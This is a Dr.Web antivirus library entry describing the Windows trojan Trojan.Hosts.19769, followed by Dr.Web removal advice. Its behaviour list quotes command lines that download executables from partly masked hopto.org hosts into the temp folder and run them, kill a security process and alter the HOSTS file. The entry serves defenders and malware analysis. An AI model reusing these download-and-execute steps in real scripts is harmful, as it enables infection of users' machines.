Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.Hosts.19769

Добавлен в вирусную базу Dr.Web: 2013-10-28

Описание добавлено:

Техническая информация

Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\in.exe'
  • '%TEMP%\1.tmp\5fitytbqhub.exe' "http://fi#####hub.hopto.org/get/wb" --output-document="%TEMP%\wb.exe"
  • '%TEMP%\wb.exe' /s
  • '%TEMP%\1.tmp\5fitytbqhub.exe' "http://fi#####hub.hopto.org/get/in" --output-document="%TEMP%\in.exe"
  • '%TEMP%\1.tmp\5fitytbqhub.exe' "http://fi#####hub.hopto.org/get/lo" --output-document="%TEMP%\lo.exe"
  • '%TEMP%\lo.exe'
  • '%TEMP%\wb.exe' (загружен из сети Интернет)
  • '%TEMP%\in.exe' (загружен из сети Интернет)
  • '%TEMP%\lo.exe' (загружен из сети Интернет)
Запускает на исполнение:
  • '<SYSTEM32>\wscript.exe' "%TEMP%\1.tmp\3fitytbqhub.vbs"
  • '<SYSTEM32>\wscript.exe' "%TEMP%\1.tmp\4fitytbqhub.vbs"
  • '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\bat.bat" "
  • '<SYSTEM32>\taskkill.exe' /im praetorian.exe
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\lo.exe
  • %TEMP%\1.tmp\1fitytbqhub
  • %TEMP%\in.exe
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\119[1]
  • %TEMP%\wb.exe
  • %TEMP%\1.tmp\2fitytbqhub
  • %TEMP%\1.tmp\bat.bat
  • %TEMP%\1.tmp\3fitytbqhub.vbs
  • %TEMP%\1.tmp\5fitytbqhub.exe
  • %TEMP%\1.tmp\4fitytbqhub.vbs
Удаляет следующие файлы:
  • %TEMP%\1.tmp\5fitytbqhub.exe
  • %TEMP%\1.tmp\1fitytbqhub
  • %TEMP%\1.tmp\bat.bat
  • %TEMP%\1.tmp\2fitytbqhub
  • %TEMP%\1.tmp\3fitytbqhub.vbs
  • %TEMP%\1.tmp\4fitytbqhub.vbs
Изменяет файл HOSTS.
Сетевая активность:
Подключается к:
  • 'cy####.hopto.org':80
  • 'localhost':1039
  • 'fi#####hub.hopto.org':80
TCP:
Запросы HTTP GET:
  • fi#####hub.hopto.org/get/wb
  • cy####.hopto.org/parm/poh/119
  • fi#####hub.hopto.org/get/lo
  • fi#####hub.hopto.org/get/in
UDP:
  • DNS ASK cy####.hopto.org
  • DNS ASK fi#####hub.hopto.org
Другое:
Ищет следующие окна:
  • ClassName: '(null)' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке